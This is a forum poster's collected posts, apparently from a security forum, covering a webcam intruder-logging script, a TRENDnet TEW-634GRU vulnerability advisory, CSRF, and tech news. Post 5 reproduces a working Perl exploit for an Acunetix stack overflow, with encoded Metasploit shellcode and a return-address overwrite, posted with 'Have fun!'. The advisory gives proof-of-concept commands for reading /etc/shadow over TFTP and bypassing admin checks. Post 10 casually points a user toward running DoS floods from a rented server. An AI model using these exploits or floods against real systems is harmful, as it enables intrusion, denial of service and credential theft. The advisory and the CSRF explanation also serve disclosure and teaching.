
SirGod

Active Members
  • Posts: 784
  • Days Won: 27

Posts posted by SirGod

  1. This is a small guide for avoiding, or finding out who is trying to play bad jokes on us, or for helping us identify an "intruder". It was made and tested on Ubuntu 14.04; most likely it varies from distribution to distribution, but that is solved through configuration.

    1. Install streamer to capture the picture. You can use something else as well: ffmpeg, mplayer, etc.

    sudo apt-get install streamer

    2. Install mutt to send mail with an attachment:

    sudo apt-get install mutt

    3. Find the camera we want to use. Usually it is video0 (especially on laptops, where it is built in):

    ls /dev | grep video

    4. Now we have two files: config.cfg and script.sh.

    >>> config.cfg


    # The string to look for
    stringName = unix_chkpwd

    # The file to look into
    logFile = /var/log/auth.log

    # The device address
    deviceAddress = /dev/video0

    # Screenshot save location
    saveLocation = /home/path

    # E-mail address
    emailAddress = yourmail@gmail.com

    # Body text
    bodyText = /home/path/message.txt

    >>> script.sh

    #!/bin/bash

    # CONFIGURATION
    FILE_NO_FILE=/tmp/file_net
    FILE_NO=1
    # Read each "key = value" entry from config.cfg; anchor on the key and strip the spaces around the value
    STRING=$(grep '^stringName' config.cfg | cut -d'=' -f2 | tr -d ' ')
    DEVICE=$(grep '^deviceAddress' config.cfg | cut -d'=' -f2 | tr -d ' ')
    LOGFILE=$(grep '^logFile' config.cfg | cut -d'=' -f2 | tr -d ' ')
    LOCATION=$(grep '^saveLocation' config.cfg | cut -d'=' -f2 | tr -d ' ')
    EMAIL=$(grep '^emailAddress' config.cfg | cut -d'=' -f2 | tr -d ' ')
    BODY=$(grep '^bodyText' config.cfg | cut -d'=' -f2 | tr -d ' ')

    # DO IT
    while :
    do
        if grep -q "$STRING" "$LOGFILE"
        then
            # CHECK FILE NUMBER (persisted so pictures are never overwritten across restarts)
            if [ -f "$FILE_NO_FILE" ]; then
                FILE_NO=$(cat "$FILE_NO_FILE")
            fi
            let FILE_NO=FILE_NO+1
            echo "$FILE_NO" > "$FILE_NO_FILE"

            # Take the picture and mail it, then empty the log so the same attempt is not reported twice
            streamer -c "$DEVICE" -b 16 -o "$LOCATION/file_$FILE_NO.jpeg"
            mutt -s "Photo for failed login attempt!" "$EMAIL" -a "$LOCATION/file_$FILE_NO.jpeg" < "$BODY"
            cat /dev/null > "$LOGFILE"
        fi
        sleep 1 # SECONDS between checks, so the loop does not spin when there is nothing to report
    done

    Now let's see what is what:

    >>> config.cfg

    stringName holds a string that is written to the authentication log (in Ubuntu's case) at the moment a failed login attempt occurs.

    logFile is the log in which we search for the string.

    deviceAddress is the location of the webcam we take the picture with.

    saveLocation is the location where we want to save the pictures.

    emailAddress is the mail address the picture is sent to.

    bodyText is the body of the mail.

    >>> script.sh

    FILE_NO_FILE is a file where we store a number that we append to the end of the picture's name so that we do not overwrite the picture.

    FILE_NO is the variable holding the initial number.

    STRING, LOGFILE, LOCATION, DEVICE, BODY and EMAIL are the variables where we store the data written in the configuration file.

    We put everything in an infinite loop to make sure it runs permanently. Next, we check whether FILE_NO_FILE exists, then increment the number. If the string is found in the log, the command to capture the picture is executed and the mail is sent to us. I also added a 1 second timeout between runs to avoid other situations. Afterwards we empty the log.

    5. Running the script

    To avoid execution terminating when logging off/locking, we run the script with nohup:

    sudo nohup ./script.sh &

    Now wait for "intruders". It can be added to startup if you need to. There are certainly better variants, I am waiting for them.

    • Upvote 2
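The same failed-login watcher, as an added example in Python that is not the original post's script. It reads the post's config.cfg keys (stringName, logFile, deviceAddress, saveLocation, emailAddress, bodyText) but, instead of truncating auth.log after each hit, it remembers how far it has read, so the log stays intact for later review. The streamer/mutt commands from the post are only executed when the environment variable RUN=1 is set; the sample config and log excerpt are constructed for this example.

```python
"""Added example, not the original post's script: a failed-login watcher that keeps
the log intact by tracking a read offset instead of truncating auth.log.
streamer/mutt run only when RUN=1 is set, so the module is safe to import.
"""
import os
import subprocess
import tempfile
from pathlib import Path

# Constructed config in the post's "key = value" format.
SAMPLE_CONFIG = """\
# The string to look for
stringName = unix_chkpwd

# The file to look into
logFile = /var/log/auth.log
deviceAddress = /dev/video0
saveLocation = /home/path
emailAddress = yourmail@gmail.com
bodyText = /home/path/message.txt
"""

# Constructed auth.log excerpt: two failed password checks among normal entries.
SAMPLE_LOG = (
    "Mar  1 10:00:01 box sshd[1001]: Accepted publickey for alice from 10.0.0.5\n"
    "Mar  1 10:02:17 box unix_chkpwd[1042]: password check failed for user (bob)\n"
    "Mar  1 10:02:17 box lightdm: pam_unix(lightdm:auth): authentication failure; user=bob\n"
    "Mar  1 10:02:19 box unix_chkpwd[1043]: password check failed for user (bob)\n"
)


def parse_config(text):
    """Parse 'key = value' lines, skipping blanks and '#' comments."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        cfg[key.strip()] = value.strip()
    return cfg


def new_matches(log_path, marker, offset):
    """Return (lines containing `marker` written after byte `offset`, new offset).
    If the file shrank (log rotation), reading restarts from the beginning."""
    if log_path.stat().st_size < offset:
        offset = 0
    with log_path.open("rb") as fh:
        fh.seek(offset)
        chunk = fh.read()
    lines = chunk.decode("utf-8", "replace").splitlines()
    return [line for line in lines if marker in line], offset + len(chunk)


def next_counter(state_path):
    """Persist an increasing counter so snapshot file names never collide."""
    n = int(state_path.read_text()) + 1 if state_path.exists() else 1
    state_path.write_text(str(n))
    return n


def capture_and_mail(cfg, n):
    """Build the streamer and mutt commands from the post for snapshot number `n`.
    They are returned for inspection and executed only when RUN=1."""
    shot = f"{cfg['saveLocation']}/file_{n}.jpeg"
    cmds = [
        ["streamer", "-c", cfg["deviceAddress"], "-b", "16", "-o", shot],
        ["mutt", "-s", "Photo for failed login attempt!", "-a", shot, "--", cfg["emailAddress"]],
    ]
    if os.environ.get("RUN") == "1":
        subprocess.run(cmds[0], check=False)
        with open(cfg["bodyText"], "rb") as body:
            subprocess.run(cmds[1], stdin=body, check=False)
    return cmds


def demo():
    """One polling pass over constructed files; returns (hits, counter, hits on re-read)."""
    workdir = Path(tempfile.mkdtemp())
    log = workdir / "auth.log"
    log.write_text(SAMPLE_LOG)
    cfg = parse_config(SAMPLE_CONFIG)
    hits, offset = new_matches(log, cfg["stringName"], 0)
    counter = 0
    for _ in hits:
        counter = next_counter(workdir / "counter")
        capture_and_mail(cfg, counter)
    # A second pass from the saved offset sees nothing new, so the log never needs emptying.
    again, _ = new_matches(log, cfg["stringName"], offset)
    return len(hits), counter, len(again)


if __name__ == "__main__":
    print(demo())
```

In a real deployment the loop would call new_matches every second with the offset carried over between iterations, which replaces both the busy loop and the `cat /dev/null > auth.log` step of the original script.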
  2. Did you decompile the firmware? If so, with which tools... because I want to bang my head against something on a D-Link too?

    Yes. Initially I decompiled the firmware. I used binwalk, firmware-mod-kit and dd to extract the filesystem from the correct offset. Note that if you take the kit from Google Code and the FS is newer, the default one will not be able to extract it. That is what happened to me, but it has the source for other versions. I compiled a newer one and it worked.

  3. Considering the recent situation, I decided to look a little through the internals. There are other things too, but there was no point in mentioning them. What I found interesting, and did not note down, is a file:

    /www/CVS/Root

    which has the following content:

    :pserver:joe_lin@172.21.32.250:/cvsroot/WWW

    I have not yet figured out what exactly it is; I will investigate further because it looks suspicious.

    Below you have the "advisory":

    # Title: TRENDnet TEW-634GRU 1.00.23 Multiple Vulnerabilities
    # Author: SirGod
    # Website: www.rstforums.com
    # Vendor Homepage: http://www.trendnet.com/
    # Version: 1.00.23

    1. Local file disclosure

    The router has the TFTP service enabled by default and it can be accessed without any prior authentication (since TFTP does not support authentication). The whole filesystem is exposed to any person that is connected to the network.

    Proof of concept:

    sirgod@linuxbox:~$ tftp 192.168.10.1
    tftp> get
    (files) /etc/shadow
    Received 357 bytes in 0.3 seconds
    tftp> quit
    sirgod@linuxbox:~$ cat shadow
    root::10933:0:99999:7:::
    Admin:[REMOVED]:10933:0:99999:7:::
    bin::10933:0:99999:7:::
    daemon::10933:0:99999:7:::
    adm::10933:0:99999:7:::
    lp:*:10933:0:99999:7:::
    sync:*:10933:0:99999:7:::
    shutdown:*:10933:0:99999:7:::
    halt:*:10933:0:99999:7:::
    uucp:*:10933:0:99999:7:::
    operator:*:10933:0:99999:7:::
    nobody::10933:0:99999:7:::
    ap71::10933:0:99999:7:::

    2. Local router crash

    If you upload a file to the router, it will crash. You will have to reset it (physically) and reconfigure it. After the file is uploaded, accessing the router's IP will give you a blank page and then it will crash.

    Proof of concept:

    sirgod@linuxbox:~$ tftp 192.168.10.1
    tftp> put
    (file) /home/file.txt /www/file.txt

    3. Privilege escalation

    The web app incorporates two types of login: user and admin. A few actions (load settings, reset settings) require an admin account to perform them. The validation is done client-side, in JavaScript. See the following code snippet:

    settings.asp

    --- START CODE SNIPPET ---

    function check_load_settings(){
        var login_who="user";
        if(login_who== "user"){
            window.location.href ="back.asp";
        }else{
            if(confirm(msg[MSG17])){
                if (get_by_id("file").value == ''){
                    alert(msg[MSG33]);
                }else{
                    send_submit("form1");
                }
            }
        }
    }

    function check_restore_default(){
        var login_who="user";
        if(login_who== "user"){
            window.location.href ="back.asp";
        }else{
            if(confirm(msg[MSG34])){
                send_submit("form2");
            }
        }
    }

    --- END CODE SNIPPET ---

    There are two ways to bypass this:

    a) The easy way: submit the form from the JavaScript console, directly from your browser, by running:

    send_submit("form2"); // To restore factory default settings.
    send_submit("form3"); // To restore configuration settings (existent). You must select a file beforehand.

    b) The other way: you can save the page locally, change the value of the variable and run it.

    • Upvote 2
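The fix for the third issue is to make the authorization decision on the server, where the browser cannot rewrite it. The following is an added example, not code from the advisory or from the vendor's firmware: the two admin-only actions the advisory names (load settings, restore defaults) behind a server-side role check. `Session`, `RouterState`, `settings_handler` and the `ADMIN_ONLY` table are names chosen for this illustration; the role comes from the server-side session established at login, so no submitted field can play the part of the client-side `login_who` variable.

```python
"""Added example, not the advisory's or the vendor's code: server-side authorization
for the settings actions that the vulnerable page only gated in JavaScript.
"""
from dataclasses import dataclass, field


class AuthorizationError(Exception):
    """The session lacks the role the requested action needs."""


@dataclass
class Session:
    user: str
    role: str  # "user" or "admin", fixed at login; never read from the request


@dataclass
class RouterState:
    settings: dict = field(default_factory=lambda: {"ssid": "home", "wps": "on"})
    audit: list = field(default_factory=list)


DEFAULTS = {"ssid": "default", "wps": "off"}  # constructed factory defaults
ADMIN_ONLY = {"load_settings", "restore_default"}  # the advisory's form1/form2 actions


def settings_handler(session, action, form, state):
    """Dispatch one settings request after an authorization check that consults only
    the server-side session. Unknown actions are refused rather than passed through."""
    if action in ADMIN_ONLY and session.role != "admin":
        state.audit.append(f"denied {action} for {session.user} (role={session.role})")
        raise AuthorizationError(f"{action} requires the admin role")
    if action == "restore_default":
        state.settings = dict(DEFAULTS)
        state.audit.append(f"{session.user} restored defaults")
        return "defaults restored"
    if action == "load_settings":
        uploaded = form.get("file")
        if not uploaded:
            return "no file selected"  # the MSG33 case from the snippet, enforced server-side too
        state.settings.update(uploaded)
        state.audit.append(f"{session.user} loaded settings")
        return "settings loaded"
    if action == "status":
        return f"ssid={state.settings['ssid']} wps={state.settings['wps']}"
    raise ValueError(f"unknown action {action!r}")


def demo():
    """Replay a 'user' session submitting form2 directly, then a legitimate admin
    request; returns (user outcome, admin outcome, final ssid)."""
    state = RouterState()
    user = Session("guest", "user")
    admin = Session("Admin", "admin")
    # The submitted form claims login_who=admin, as an edited local copy would; it is ignored.
    try:
        settings_handler(user, "restore_default", {"login_who": "admin"}, state)
        user_outcome = "allowed"
    except AuthorizationError:
        user_outcome = "denied"
    assert state.settings["ssid"] == "home"  # nothing changed for the unauthorized caller
    admin_outcome = settings_handler(admin, "restore_default", {}, state)
    return user_outcome, admin_outcome, state.settings["ssid"]


if __name__ == "__main__":
    print(demo())
```

The denied attempt also lands in the audit list, which is the signal a defender wants: a "user" session reaching an admin-only endpoint directly is exactly the bypass the advisory describes, and it should be visible in the logs rather than silently redirected to back.asp.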
  4. Ok, I managed to put Kali on Android, only I have one problem. You have to connect to it with a VNC viewer... Doesn't it seem a bit awkward to you? I mean it looks like hell and on top of that you can barely control it.

    If you need a graphical interface, this is the only solution: connecting through a service such as VNC. I don't understand what you were expecting.

  5. Have fun! :-)

    # Exploit Title: Acunetix Stack Based overflow
    # Date: 24/04/14
    # Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
    # Vendor Homepage: http://www.acunetix.com/
    # Software Link: http://www.acunetix.com/vulnerability-scanner/download/
    # Version: 8 build 20120704
    # Tested on: XP

    # This exploit generates an HTML file; if this HTML is scanned with ACUNETIX, the shell will be executed.

    my $file= "index.html";
    my $HTMLHeader1 = "<html>\r\n";
    my $HTMLHeader2 = "\r\n</html>";
    my $IMGheader1 = "<img style=\"opacity:0.0;filter:alpha(opacity=0);\" src=http://";
    my $IMGheader2 = "><br>\n";

    my $DomainName1 = "XSS";
    my $DomainName2 = "CSRF";
    my $DomainName3 = "DeepScan";
    my $DomainName4 = "NetworkScan";
    my $DomainName5 = "DenialOfService";
    my $GeneralDotPadding = "." x 190;

    my $ExploitDomain = "SQLInjection";
    my $DotPadding = "." x (202-length($ExploitDomain));
    my $Padding1 = "A"x66;
    my $Padding2 = "B"x4;
    my $FlowCorrector = "500f"; #0x66303035 : readable memory location for fixing the flow
    my $EIPOverWrite = "]Qy~"; #0x7e79515d (JMP ESP from SXS.DLL).

    # windows/exec - 461 bytes
    # http://www.metasploit.com
    # Encoder: x86/alpha_upper
    # VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
    # CMD=calc.exe
    my $shellcode2 =
    "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a" .
    "\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48" .
    "\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51" .
    "\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43" .
    "\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x33\x30\x45\x50\x53" .
    "\x30\x33\x50\x4c\x49\x4a\x45\x46\x51\x48\x52\x52\x44\x4c" .
    "\x4b\x36\x32\x50\x30\x4c\x4b\x51\x42\x34\x4c\x4c\x4b\x51" .
    "\x42\x35\x44\x4c\x4b\x52\x52\x37\x58\x54\x4f\x48\x37\x51" .
    "\x5a\x57\x56\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x37" .
    "\x4c\x45\x31\x33\x4c\x45\x52\x36\x4c\x47\x50\x59\x51\x58" .
    "\x4f\x54\x4d\x53\x31\x49\x57\x4d\x32\x4c\x30\x50\x52\x46" .
    "\x37\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x30\x42\x57\x4c\x45" .
    "\x51\x4e\x30\x4c\x4b\x57\x30\x34\x38\x4b\x35\x59\x50\x42" .
    "\x54\x31\x5a\x53\x31\x48\x50\x36\x30\x4c\x4b\x37\x38\x52" .
    "\x38\x4c\x4b\x46\x38\x51\x30\x43\x31\x49\x43\x4a\x43\x47" .
    "\x4c\x47\x39\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x48\x56\x36" .
    "\x51\x4b\x4f\x56\x51\x39\x50\x4e\x4c\x39\x51\x38\x4f\x54" .
    "\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x43\x45\x4a\x54\x35" .
    "\x53\x53\x4d\x4b\x48\x57\x4b\x43\x4d\x57\x54\x34\x35\x5a" .
    "\x42\x31\x48\x4c\x4b\x56\x38\x37\x54\x33\x31\x48\x53\x32" .
    "\x46\x4c\x4b\x34\x4c\x50\x4b\x4c\x4b\x56\x38\x35\x4c\x43" .
    "\x31\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x43\x31\x4e\x30\x4b" .
    "\x39\x51\x54\x31\x34\x56\x44\x51\x4b\x51\x4b\x43\x51\x36" .
    "\x39\x51\x4a\x30\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x30" .
    "\x5a\x4c\x4b\x54\x52\x4a\x4b\x4b\x36\x31\x4d\x33\x5a\x53" .
    "\x31\x4c\x4d\x4b\x35\x4f\x49\x55\x50\x35\x50\x35\x50\x46" .
    "\x30\x42\x48\x36\x51\x4c\x4b\x32\x4f\x4b\x37\x4b\x4f\x58" .
    "\x55\x4f\x4b\x4b\x50\x45\x4d\x36\x4a\x34\x4a\x43\x58\x4e" .
    "\x46\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x39\x45\x57\x4c\x43" .
    "\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x42\x55\x34" .
    "\x45\x4f\x4b\x30\x47\x54\x53\x34\x32\x42\x4f\x52\x4a\x33" .
    "\x30\x51\x43\x4b\x4f\x59\x45\x45\x33\x33\x51\x52\x4c\x35" .
    "\x33\x46\x4e\x35\x35\x53\x48\x52\x45\x45\x50\x41\x41";

    my $FinalDomainName1 = $IMGheader1.$DomainName1.$GeneralDotPadding.$IMGheader2;
    my $FinalDomainName2 = $IMGheader1.$DomainName2.$GeneralDotPadding.$IMGheader2;
    my $FinalDomainName3 = $IMGheader1.$DomainName3.$GeneralDotPadding.$IMGheader2;
    my $FinalDomainName4 = $IMGheader1.$DomainName4.$GeneralDotPadding.$IMGheader2;
    my $FinalDomainName5 = $IMGheader1.$DomainName5.$GeneralDotPadding.$IMGheader2;

    my $FinalExploitDomain = $IMGheader1.$ExploitDomain.$DotPadding.$Padding1.$FlowCorrector.$Padding2.$EIPOverWrite.$shellcode.$IMGheader2;
    open($FILE,">$file");
    print $FILE $HTMLHeader1.$FinalDomainName1.$FinalDomainName2.$FinalDomainName3.$FinalDomainName4.$FinalDomainName5.$FinalExploitDomain.$HTMLHeader2;
    close($FILE);
    print"Acunetix Killer File Created successfully\n";

  6. It seems version 3.14 was released right on 3.14. Hehe.

    "The Linux 3.14 "Shuffling Zombie Juror" kernel has been released. Significant improvements to Linux 3.14 include the mainlining of SCHED_DEADLINE, stable support for Intel Broadwell CPU graphics, Xen PVH support, stable support for ZRAM, and many other additions. There's also a tentative feature list on KernelNewbies.org."

    Source: Slashdot: News for nerds, stuff that matters

  7. I already made a "grabber" to see which variables are sent, but I don't quite understand exactly what you mean regarding the CSRF protection.

    Could you give me a code example of how I could extract the variables with preg_match?

    Thank you.

    For protection against CSRF, a hidden input with a token (a unique code, usually a random hash) is normally added. When the form is submitted, it is checked whether that code is valid: if it is, the form is submitted; if it is not valid, you get an error or are redirected, etc. As a real example, so you understand how it works, let's say you have in the control panel a password-change form that has two inputs, new password and repeat new password, plus a submit button (without asking for the old password). You can abuse this by creating an HTML page with the inputs already filled in (the password you want to set) and submitting the form on the onLoad event with your data to the page that processes them. When the "victim" visits your page, a request is made to the page that changes the password, and the password will be changed to the one you chose. The "victim" only has to be logged in. To get back to the anti-CSRF hash: if in the example mentioned, besides the two inputs, there were also a unique hash, you would have no way to submit the form, because you had no way of knowing that hash in order to "fill it in" on your HTML page.

    For preg_match:

    PHP: preg_match - Manual

    You have enough examples there.
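The token mechanism the reply describes, as an added example that is not code from the post, applied to the password-change form used as its illustration. The token is an HMAC of the session id under a server secret, so it is bound to the logged-in session: a page on another origin can neither read it nor reuse a token from the attacker's own session, and it is compared in constant time. `SECRET_KEY`, `issue_token`, `change_password` and the toy user and session stores are constructed for this example.

```python
"""Added example, not code from the reply: a session-bound anti-CSRF token on the
password-change form the reply uses as its illustration.
"""
import hashlib
import hmac
import re
import secrets

SECRET_KEY = secrets.token_bytes(32)  # per process here; a real server persists it


def issue_token(session_id):
    """Derive the per-session token; the same session always gets the same token."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def token_is_valid(session_id, presented):
    """Constant-time check that `presented` is this session's token."""
    if not presented:
        return False
    return hmac.compare_digest(issue_token(session_id), presented)


def render_change_password_form(session_id):
    """The control-panel form, with the hidden token input the reply mentions."""
    return (
        '<form method="post" action="/change_password">\n'
        f'  <input type="hidden" name="csrf_token" value="{issue_token(session_id)}">\n'
        '  <input type="password" name="new_password">\n'
        '  <input type="password" name="repeat_password">\n'
        '  <input type="submit" value="Change">\n'
        "</form>\n"
    )


def change_password(users, sessions, session_id, form):
    """Server-side handler: refuses the request unless the token matches the session."""
    user = sessions.get(session_id)
    if user is None:
        return "not logged in"
    if not token_is_valid(session_id, form.get("csrf_token")):
        return "rejected: missing or invalid CSRF token"
    if not form.get("new_password") or form["new_password"] != form.get("repeat_password"):
        return "passwords empty or do not match"
    users[user] = hashlib.sha256(form["new_password"].encode()).hexdigest()  # toy store
    return "password changed"


def extract_token(html):
    """What a browser does implicitly: submit the hidden field it was served."""
    match = re.search(r'name="csrf_token" value="([0-9a-f]{64})"', html)
    return match.group(1) if match else None


def demo():
    """Three submissions against a logged-in victim session; returns their outcomes."""
    sessions = {"sid-victim": "victim", "sid-attacker": "attacker"}  # constructed
    users = {"victim": "old-hash", "attacker": "other-hash"}
    # 1) The cross-site page the reply describes: inputs pre-filled, but no token.
    forged = {"new_password": "owned", "repeat_password": "owned"}
    r_forged = change_password(users, sessions, "sid-victim", forged)
    # 2) A token copied from the attacker's own session: valid there, bound to the wrong session here.
    copied = dict(forged, csrf_token=issue_token("sid-attacker"))
    r_copied = change_password(users, sessions, "sid-victim", copied)
    # 3) The victim submits the form exactly as it was served.
    token = extract_token(render_change_password_form("sid-victim"))
    legit = {"csrf_token": token, "new_password": "n3w-pass", "repeat_password": "n3w-pass"}
    r_legit = change_password(users, sessions, "sid-victim", legit)
    return r_forged, r_copied, r_legit, users["victim"] != "old-hash"


if __name__ == "__main__":
    print(demo())
```

Binding the token to the session is what makes case 2 fail: a token is not a shared secret of the whole site but of one login, so knowing your own token tells you nothing about the victim's.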

  8. "The Snowden revelations continue, with The Intercept releasing an NSA document titled 'I hunt sys admins' (PDF on Cryptome). The document details NSA plans to break into systems administrators' computers in order to gain access to the networks they control. The Intercept has a detailed analysis of the leaked document. Quoting: 'The classified posts reveal how the NSA official aspired to create a database that would function as an international hit list of sys admins to potentially target. Yet the document makes clear that the admins are not suspected of any criminal activity – they are targeted only because they control access to networks the agency wants to infiltrate. "Who better to target than the person that already has the ‘keys to the kingdom’?" one of the posts says.'"

    Source: Slashdot: News for nerds, stuff that matters

  9. There are many reasons to upgrade to 4.4.x (better memory management, new features, support for various devices, cloud printing, etc.). One reason to stay on 4.2.2 would be that starting with 4.4 AppOps (native) was removed, namely that "hidden feature" which lets you restrict permissions for each application individually (e.g. restricting the Facebook application's access to the camera, location, etc.). You can do this on 4.4.2 too if you root your phone, install the Xposed framework and the permission-control module, where you will have access to even more permissions than those present in AppOps. Another reason would be stability/compatibility: usually the versions products are launched with are the most suitable in terms of compatibility with that hardware.

  10. Hi,

    Almost all hosting companies can offer you a VPS/dedicated server with an operating system of your choice (usually UNIX/GNU Linux based). I want to let you know that on all these systems you will have root access, where you can do whatever you want (scams, videochat, DoS, etc.) at your own risk.

    There is also the alternative of installing such a system on a PC of your own. => "free root". Likewise, you do whatever you want. Unfortunately there is no host, at the moment, specialised in what you want, namely "flood" and "udp.pl".

    Good luck!

  11. As advice for the tutorial's readers: do not rely on "hidden SSID" and "MAC filtering". They are roughly insignificant obstacles. Use WPA2 (AES as cipher) with at least a decent password, and be careful if you play with WPS (recommended OFF). And for speed, 802.11ac (5GHz only) appeared some time ago, far superior; we went from Mb to Gb.

  12. "Researchers at Bromium Labs are expected to announce today they have developed an exploit that bypasses all of the mitigations in Microsoft's Enhanced Mitigation Experience Toolkit (EMET). Principal security researcher Jared DeMott delivered a presentation at the Security BSides conference explaining how the company's researchers were able to bypass all of the memory protections offered within the free Windows toolkit. The work is significant given that Microsoft has been quick to urge customers to install and run EMET as a temporary mitigation against zero-day exploits targeting memory vulnerabilities in Windows or Internet Explorer. The exploit bypasses all of EMET's mitigations, unlike previous bypasses that were able to beat only certain aspects of the tool. Researchers took a real-world IE exploit and tweaked it until they had a complete bypass of EMET's ROP, heap spray, SEHOP, ASLR, and DEP mitigations."

    Via msm1267, Slashdot: News for nerds, stuff that matters

    • Upvote 1
  13. If it still gives you the error, try registering the DLL. Go to the command prompt, navigate to the folder where you have the DLL and type:

    regsvr32 python27.dll

    But here it depends on the operating system. Is it x86 or x64? Because Microsoft says:

    Note: On a 64-bit version of the Windows operating system, there are two versions of the Regsvr32.exe file:

    • The 64-bit version is %systemroot%\System32\regsvr32.exe.
    • The 32-bit version is %systemroot%\SysWoW64\regsvr32.exe.

    It will use the default version depending on the operating system.
